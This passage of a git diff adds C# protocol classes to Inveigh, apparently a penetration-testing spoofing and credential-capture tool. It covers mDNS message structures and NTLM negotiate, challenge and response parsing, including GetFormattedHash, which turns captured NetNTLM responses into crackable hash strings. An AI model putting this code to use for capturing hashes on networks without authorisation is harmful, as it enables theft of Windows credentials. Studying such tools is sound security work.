this.Resource = new MDNSResource + { + Name = this.Question.QName, + Type = this.Question.QType, + Class = this.Question.QClass, + TTL = ttl, + RDLength = (ushort)rdata.Length, + RData = rdata + }; + + return Utilities.BlockCopy(this.Header.GetBytes(), this.Question.GetBytes(), this.Resource.GetBytes()); + } + + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/MDNS/MDNSQuestion.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/MDNS/MDNSQuestion.cs new file mode 100644 index 0000000..34bee2b --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/MDNS/MDNSQuestion.cs @@ -0,0 +1,63 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using Quiddity.DNS; +using System; + +namespace Quiddity.MDNS +{ + class MDNSQuestion : DNSQuestion + { + public string QuestionType { get; set; } + + public MDNSQuestion() + { + + } + + public MDNSQuestion(byte[] data) + { + ReadBytes(data, 12); + string qclass = Convert.ToString(BitConverter.ToUInt16(this.QClass, 0), 2).PadLeft(16, '0'); + + if (qclass.StartsWith("1")) + { + this.QuestionType = "QU"; + } + else + { + this.QuestionType = "QM"; + } + + } + + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/MDNS/MDNSResource.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/MDNS/MDNSResource.cs new file mode 100644 index 0000000..c95d013 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/MDNS/MDNSResource.cs @@ -0,0 +1,39 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using Quiddity.DNS; + +namespace Quiddity.MDNS +{ + class MDNSResource : DNSResource + { + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/NTLMChallenge.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/NTLMChallenge.cs new file mode 100644 index 0000000..4f91c24 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/NTLMChallenge.cs @@ -0,0 +1,275 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System; +using System.Text; +using System.IO; +using Quiddity.Support; +using Quiddity.SPNEGO; + +namespace Quiddity.NTLM +{ + class NTLMChallenge + { + //https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nlmp/801a4681-8809-4be9-ab0d-61dcfe762786 + public byte[] Signature { get; set; } + public uint MessageType { get; set; } + public ushort TargetNameLen { get; set; } + public ushort TargetNameMaxLen { get; set; } + public uint TargetNameBufferOffset { get; set; } + public byte[] NegotiateFlags { get; set; } + public byte[] ServerChallenge { get; set; } + public UInt64 Reserved { get; set; } + public ushort TargetInfoLen { get; set; } + public ushort TargetInfoMaxLen { get; set; } + public uint TargetInfoBufferOffset { get; set; } + public byte[] Version { get; set; } + public byte[] Payload { get; set; } + + public NTLMChallenge() + { + this.Signature = new byte[8] { 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00 }; // NTLMSSP + this.MessageType = 2; + this.TargetNameLen = 0; + this.TargetNameMaxLen = 0; + this.TargetNameBufferOffset = 56; + this.NegotiateFlags = new byte[4] { 0x15, 0x82, 0x8a, 0xe2 }; + this.ServerChallenge = new byte[16]; + this.Reserved = 0; + this.TargetInfoLen = 0; + this.TargetInfoMaxLen = 0; + this.TargetInfoBufferOffset = 0; + this.Version = new byte[8] { 0x0a, 0x00, 0x61, 0x4a, 0x00, 0x00, 0x00, 0x0f }; + this.Payload = new byte[0]; + } + + public NTLMChallenge(byte[] data) + { + string signature = Encoding.UTF8.GetString(data); + + if (signature.StartsWith("NTLMSSP")) + { + ReadBytes(data, 0); + } + else + { + SPNEGONegTokenResp token = this.Decode(data); + this.ReadBytes(token.ResponseToken, 0); + } + + } + + public NTLMChallenge(byte[] data, int offset) + { + ReadBytes(data, offset); + } + + public NTLMChallenge(byte[] data, bool decode) + { + + if (decode) + { + SPNEGONegTokenResp token = this.Decode(data); + ReadBytes(token.ResponseToken, 0); + } + else + { + ReadBytes(data, 0); + } + + } + + public NTLMChallenge(string challenge, string netBIOSDomainName, string netBIOSComputerName, string dnsDomainName, string dnsComputerName, string dnsTreeName) + { + this.Signature = new byte[8] { 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00 }; // NTLMSSP + this.MessageType = 2; + this.TargetNameLen = 0; + this.TargetNameMaxLen = 0; + this.TargetNameBufferOffset = 56; + this.NegotiateFlags = new byte[4] { 0x15, 0x82, 0x8a, 0xe2 }; + this.ServerChallenge = new byte[16]; + this.Reserved = 0; + this.TargetInfoLen = 0; + this.TargetInfoMaxLen = 0; + this.TargetInfoBufferOffset = 0; + this.Version = new byte[8] { 0x0a, 0x00, 0x61, 0x4a, 0x00, 0x00, 0x00, 0x0f }; + this.Payload = new byte[0]; + this.ServerChallenge = this.Challenge(challenge); + byte[] timestamp = BitConverter.GetBytes(DateTime.Now.ToFileTime()); + NTLMAVPair ntlmAVPair = new NTLMAVPair(); + this.Payload = ntlmAVPair.GetBytes(netBIOSDomainName, netBIOSComputerName, dnsDomainName, dnsComputerName, dnsTreeName, timestamp); + } + + public NTLMChallenge(string challenge, string netBIOSDomainName, string netBIOSComputerName, string dnsDomainName, string dnsComputerName, string dnsTreeName, byte[] timestamp) + { + this.Signature = new byte[8] { 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00 }; // NTLMSSP + this.MessageType = 2; + this.TargetNameLen = 0; + this.TargetNameMaxLen = 0; + this.TargetNameBufferOffset = 56; + this.NegotiateFlags = new byte[4] { 0x15, 0x82, 0x8a, 0xe2 }; + this.ServerChallenge = new byte[16]; + this.Reserved = 0; + this.TargetInfoLen = 0; + this.TargetInfoMaxLen = 0; + this.TargetInfoBufferOffset = 0; + this.Version = new byte[8] { 0x0a, 0x00, 0x61, 0x4a, 0x00, 0x00, 0x00, 0x0f }; + this.Payload = new byte[0]; + this.ServerChallenge = this.Challenge(challenge); + NTLMAVPair ntlmAVPair = new NTLMAVPair(); + this.Payload = ntlmAVPair.GetBytes(netBIOSDomainName, netBIOSComputerName, dnsDomainName, dnsComputerName, dnsTreeName, timestamp); + } + + public void ReadBytes(byte[] data, int offset) + { + + using (MemoryStream memoryStream = new MemoryStream(data)) + { + PacketReader packetReader = new PacketReader(memoryStream); + memoryStream.Position = offset; + this.Signature = packetReader.ReadBytes(8); + this.MessageType = packetReader.ReadUInt32(); + this.TargetNameLen = packetReader.ReadUInt16(); + this.TargetNameMaxLen = packetReader.ReadUInt16(); + this.TargetNameBufferOffset = packetReader.ReadUInt32(); + this.NegotiateFlags = packetReader.ReadBytes(4); + this.ServerChallenge = packetReader.ReadBytes(8); + this.Reserved = packetReader.ReadUInt64(); + this.TargetInfoLen = packetReader.ReadUInt16(); + this.TargetInfoMaxLen = packetReader.ReadUInt16(); + this.TargetInfoBufferOffset = packetReader.ReadUInt32(); + this.Version = packetReader.ReadBytes(8); + this.Payload = packetReader.ReadBytes(16); + } + + } + + public byte[] GetBytes(string targetName) + { + byte[] targetNameData = Encoding.Unicode.GetBytes(targetName); + this.TargetNameLen = (ushort)targetNameData.Length; + this.TargetNameMaxLen = this.TargetNameLen; + this.TargetInfoLen = (ushort)this.Payload.Length; + this.TargetInfoMaxLen = this.TargetInfoLen; + this.TargetInfoBufferOffset = (ushort)(targetNameData.Length + 56); + + using (MemoryStream memoryStream = new MemoryStream()) + { + PacketWriter packetWriter = new PacketWriter(memoryStream); + packetWriter.Write(this.Signature); + packetWriter.Write(this.MessageType); + packetWriter.Write(this.TargetNameLen); + packetWriter.Write(this.TargetNameMaxLen); + packetWriter.Write(this.TargetNameBufferOffset); + packetWriter.Write(this.NegotiateFlags); + packetWriter.Write(this.ServerChallenge); + packetWriter.Write(this.Reserved); + packetWriter.Write(this.TargetInfoLen); + packetWriter.Write(this.TargetInfoMaxLen); + packetWriter.Write(this.TargetInfoBufferOffset); + packetWriter.Write(this.Version); + packetWriter.Write(targetNameData); + packetWriter.Write(this.Payload); + return memoryStream.ToArray(); + } + + } + + public byte[] Encode(byte[] data) + { + SPNEGONegTokenResp spnegoNegTokenResp = new SPNEGONegTokenResp(); + spnegoNegTokenResp.NegState = 1; + spnegoNegTokenResp.SupportedMech = new byte[10] { 0x2b, 0x06, 0x01, 0x04, 0x01, 0x82, 0x37, 0x02, 0x02, 0x0a }; + byte[] segment1 = ASN1.Encode(0x04, data); + segment1 = ASN1.Encode(0xa2, segment1); + byte[] segment2 = ASN1.Encode(0x06, spnegoNegTokenResp.SupportedMech); + segment2 = ASN1.Encode(0xa1, segment2); + byte[] segment3 = ASN1.Encode(0x0a, new byte[1] { spnegoNegTokenResp.NegState }); + segment3 = ASN1.Encode(0xa0, segment3); + byte[] asn1Data = Utilities.BlockCopy(segment3, segment2, segment1); + asn1Data = ASN1.Encode(0x30, asn1Data); + asn1Data = ASN1.Encode(0xa1, asn1Data); + return asn1Data; + } + + private SPNEGONegTokenResp Decode(byte[] data) + { + + SPNEGONegTokenResp spnegoNegTokenResp = new SPNEGONegTokenResp + { + NegState = ASN1.GetTagBytes(1, data)[0], + SupportedMech = ASN1.GetTagBytes(6, data), + ResponseToken = ASN1.GetTagBytes(4, data) + }; + + return spnegoNegTokenResp; + } + + public byte[] Challenge(string challenge) + { + byte[] challengeData = new byte[8]; + string challengeNew = ""; + + if (String.IsNullOrEmpty(challenge)) + { + string challengeCharacters = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"; + char[] challengeCharactersArray = new char[8]; + Random random = new Random(); + + for (int i = 0; i < challengeCharactersArray.Length; i++) + { + challengeCharactersArray[i] = challengeCharacters[random.Next(challengeCharacters.Length)]; + } + + string finalString = new String(challengeCharactersArray); + challengeData = Encoding.UTF8.GetBytes(finalString); + challengeNew = (BitConverter.ToString(challengeData)).Replace("-", ""); + } + else + { + challengeNew = challenge; + string challengeMod = challengeNew.Insert(2, "-").Insert(5, "-").Insert(8, "-").Insert(11, "-").Insert(14, "-").Insert(17, "-").Insert(20, "-"); + int i = 0; + + foreach (string character in challengeMod.Split('-')) + { + challengeData[i] = Convert.ToByte(Convert.ToInt16(character, 16)); + i++; + } + + } + + return challengeData; + } + + } + +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/NTLMHelper.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/NTLMHelper.cs new file mode 100644 index 0000000..463eca5 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/NTLMHelper.cs @@ -0,0 +1,94 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using Quiddity.SPNEGO; +using Quiddity.Support; +using System.IO; +using System.Text; + +namespace Quiddity.NTLM +{ + class NTLMHelper + { + public string Signature { get; set; } + public uint MessageType { get; set; } + + public NTLMHelper() + { + + } + public NTLMHelper(byte[]data) + { + string signature = Encoding.UTF8.GetString(data); + + if (signature.StartsWith("NTLMSSP")) + { + ReadBytes(data, 0); + } + else + { + SPNEGONegTokenInit token = this.Decode(data); + this.ReadBytes(token.MechToken, 0); + } + } + + public NTLMHelper(byte[] data, int offset) + { + ReadBytes(data, offset); + } + + public void ReadBytes(byte[] data, int offset) + { + + using (MemoryStream memoryStream = new MemoryStream(data)) + { + PacketReader packetReader = new PacketReader(memoryStream); + memoryStream.Position = offset; + this.Signature = Encoding.UTF8.GetString(packetReader.ReadBytes(8)); + this.MessageType = packetReader.ReadUInt16(); + } + + } + + private SPNEGONegTokenInit Decode(byte[] data) + { + SPNEGONegTokenInit spnegoNegTokenInit = new SPNEGONegTokenInit + { + MechTypes = ASN1.GetTagBytes(6, data), + MechToken = ASN1.GetTagBytes(4, data) + }; + + return spnegoNegTokenInit; + } + + } + +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/NTLMNegotiate.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/NTLMNegotiate.cs new file mode 100644 index 0000000..df315d9 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/NTLMNegotiate.cs @@ -0,0 +1,120 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ + +using Quiddity.SPNEGO; +using Quiddity.Support; +using System; +using System.IO; + +namespace Quiddity.NTLM +{ + class NTLMNegotiate + { + public byte[] Signature { get; set; } + public uint MessageType { get; set; } + public byte[] NegotiateFlags { get; set; } + public ushort DomainNameLen { get; set; } + public ushort DomainNameMaxLen { get; set; } + public uint DomainNameBufferOffset { get; set; } + public ushort WorkstationLen { get; set; } + public ushort WorkstationMaxLen { get; set; } + public uint WorkstationBufferOffset { get; set; } + public byte[] Version { get; set; } + public byte[] Payload { get; set; } + + public NTLMNegotiate() + { + this.Signature = new byte[8] { 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00 }; // NTLMSSP + this.MessageType = 1; + this.NegotiateFlags = new byte[4] { 0x97, 0x82, 0x08, 0xe2 }; + this.DomainNameLen = 0; + this.DomainNameMaxLen = 0; + this.DomainNameBufferOffset = 0; + this.WorkstationLen = 0; + this.WorkstationMaxLen = 0; + this.WorkstationBufferOffset = 0; + this.Version = new byte[8] { 0x0a, 0x00, 0x61, 0x4a, 0x00, 0x00, 0x00, 0x0f }; + this.Payload = new byte[8]; + } + + public NTLMNegotiate(byte[] data, bool decode) + { + + if (decode) + { + SPNEGONegTokenInit token = this.Decode(data); + this.ReadBytes(token.MechToken, 0); + } + else + { + ReadBytes(data, 0); + } + + } + + public NTLMNegotiate ReadBytes(byte[] data, int offset) + { + + using (MemoryStream memoryStream = new MemoryStream(data)) + { + PacketReader packetReader = new PacketReader(memoryStream); + memoryStream.Position = offset; + this.Signature = packetReader.ReadBytes(8); + this.MessageType = packetReader.ReadUInt16(); + this.DomainNameLen = packetReader.ReadUInt16(); + this.DomainNameMaxLen = packetReader.ReadUInt16(); + this.DomainNameBufferOffset = packetReader.ReadUInt16(); + this.DomainNameLen = packetReader.ReadUInt16(); + this.DomainNameMaxLen = packetReader.ReadUInt16(); + this.DomainNameBufferOffset = packetReader.ReadUInt16(); + this.NegotiateFlags = packetReader.ReadBytes(4); + this.Version = packetReader.ReadBytes(8); + this.Payload = packetReader.ReadBytes(16); + return this; + } + + } + + private SPNEGONegTokenInit Decode(byte[] data) + { + SPNEGONegTokenInit spnegoNegTokenInit = new SPNEGONegTokenInit + { + MechTypes = ASN1.GetTagBytes(6, data), + MechToken = ASN1.GetTagBytes(4, data) + }; + + return spnegoNegTokenInit; + } + + } + +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/NTLMResponse.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/NTLMResponse.cs new file mode 100644 index 0000000..b3081ff --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/NTLM/NTLMResponse.cs @@ -0,0 +1,221 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ + +using Quiddity.SPNEGO; +using Quiddity.Support; +using System; +using System.IO; +using System.Text; + +namespace Quiddity.NTLM +{ + class NTLMResponse + { + //https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nlmp/033d32cc-88f9-4483-9bf2-b273055038ce + public byte[] Signature { get; set; } + public uint MessageType { get; set; } + public ushort LmChallengeResponseLen { get; set; } + public ushort LmChallengeResponseMaxLen { get; set; } + public uint LmChallengeResponseBufferOffset { get; set; } + public ushort NtChallengeResponseLen { get; set; } + public ushort NtChallengeResponseMaxLen { get; set; } + public uint NtChallengeResponseBufferOffset { get; set; } + public ushort DomainNameLen { get; set; } + public ushort DomainNameMaxLen { get; set; } + public uint DomainNameBufferOffset { get; set; } + public ushort UserNameLen { get; set; } + public ushort UserNameMaxLen { get; set; } + public uint UserNameBufferOffset { get; set; } + public ushort WorkstationLen { get; set; } + public ushort WorkstationMaxLen { get; set; } + public uint WorkstationBufferOffset { get; set; } + public ushort EncryptedRandomSessionKeyLen { get; set; } + public ushort EncryptedRandomSessionKeyMaxLen { get; set; } + public uint EncryptedRandomSessionKeyBufferOffset { get; set; } + public byte[] NegotiateFlags { get; set; } + public byte[] Version { get; set; } + public byte[] MIC { get; set; } + public byte[] Payload { get; set; } + + // custom properties + public byte[] DomainName { get; set; } + public byte[] UserName { get; set; } + public byte[] Workstation { get; set; } + public byte[] EncryptedRandomSessionKey { get; set; } + public byte[] NtChallengeResponse { get; set; } + public byte[] LmChallengeResponse { get; set; } + public byte[] Timestamp { get; set; } + + public NTLMResponse() + { + this.Signature = new byte[8] { 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00 }; // NTLMSSP + this.MessageType = 3; + this.LmChallengeResponseLen = 0; + this.LmChallengeResponseMaxLen = 0; + this.LmChallengeResponseBufferOffset = 0; + this.NtChallengeResponseLen = 0; + this.NtChallengeResponseMaxLen = 0; + this.NtChallengeResponseBufferOffset = 0; + this.DomainNameLen = 0; + this.DomainNameMaxLen = 0; + this.DomainNameBufferOffset = 0; + this.UserNameLen = 0; + this.UserNameMaxLen = 0; + this.UserNameBufferOffset = 0; + this.WorkstationLen = 0; + this.WorkstationMaxLen = 0; + this.WorkstationBufferOffset = 0; + this.EncryptedRandomSessionKeyLen = 0; + this.EncryptedRandomSessionKeyMaxLen = 0; + this.EncryptedRandomSessionKeyBufferOffset = 0; + this.NegotiateFlags = new byte[4] { 0x15, 0x82, 0x8a, 0xe2 }; + this.Version = new byte[8] { 0x0a, 0x00, 0x61, 0x4a, 0x00, 0x00, 0x00, 0x0f }; + this.MIC = new byte[16]; + this.Payload = new byte[0]; + } + + public NTLMResponse(byte[] data) + { + string signature = Encoding.UTF8.GetString(data); + + if (signature.StartsWith("NTLMSSP")) + { + ReadBytes(data); + } + else + { + SPNEGONegTokenResp token = this.Decode(data); + this.ReadBytes(token.ResponseToken); + } + + ParseValues(); + } + + public NTLMResponse(byte[] data, bool decode) + { + + if(decode) + { + SPNEGONegTokenResp token = this.Decode(data); + this.ReadBytes(token.ResponseToken); + } + else + { + ReadBytes(data); + } + + ParseValues(); + } + + public void ReadBytes(byte[] data) + { + + using (MemoryStream memoryStream = new MemoryStream(data)) + { + PacketReader packetReader = new PacketReader(memoryStream); + this.Signature = packetReader.ReadBytes(8); + this.MessageType = packetReader.ReadUInt32(); + this.LmChallengeResponseLen = packetReader.ReadUInt16(); + this.LmChallengeResponseMaxLen = packetReader.ReadUInt16(); + this.LmChallengeResponseBufferOffset = packetReader.ReadUInt32(); + this.NtChallengeResponseLen = packetReader.ReadUInt16(); + this.NtChallengeResponseMaxLen = packetReader.ReadUInt16(); + this.NtChallengeResponseBufferOffset = packetReader.ReadUInt32(); + this.DomainNameLen = packetReader.ReadUInt16(); + this.DomainNameMaxLen = packetReader.ReadUInt16(); + this.DomainNameBufferOffset = packetReader.ReadUInt32(); + this.UserNameLen = packetReader.ReadUInt16(); + this.UserNameMaxLen = packetReader.ReadUInt16(); + this.UserNameBufferOffset = packetReader.ReadUInt32(); + this.WorkstationLen = packetReader.ReadUInt16(); + this.WorkstationMaxLen = packetReader.ReadUInt16(); + this.WorkstationBufferOffset = packetReader.ReadUInt32(); + this.EncryptedRandomSessionKeyLen = packetReader.ReadUInt16(); + this.EncryptedRandomSessionKeyMaxLen = packetReader.ReadUInt16(); + this.EncryptedRandomSessionKeyBufferOffset = packetReader.ReadUInt32(); + this.NegotiateFlags = packetReader.ReadBytes(4); + this.Version = packetReader.ReadBytes(8); + this.MIC = packetReader.ReadBytes(16); + this.Payload = packetReader.ReadBytes(data.Length - 88); + } + + } + + public string GetFormattedHash(string challenge, string user, string domain) + { + string hash = ""; + + if (this.NtChallengeResponse.Length > 24) + { + hash = user + "::" + domain + ":" + challenge + ":" + BitConverter.ToString(this.NtChallengeResponse).Replace("-", "").Insert(32, ":"); + } + else if (this.NtChallengeResponse.Length == 24) + { + hash = user + "::" + domain + ":" + BitConverter.ToString(this.LmChallengeResponse).Replace("-", "") + ":" + BitConverter.ToString(this.NtChallengeResponse).Replace("-", "").Insert(32, ":") + ":" + challenge; + } + + return hash; + } + + private SPNEGONegTokenResp Decode(byte[] data) + { + + SPNEGONegTokenResp spnegoNegTokenResp = new SPNEGONegTokenResp + { + NegState = ASN1.GetTagBytes(10, data)[0], + //SupportedMech = ASN1.GetTagBytes(6, data), + ResponseToken = ASN1.GetTagBytes(4, data), + //MechListMIC = ASN1.GetTagBytes(4, ASN1.GetTagBytes(163, data)) + }; + + 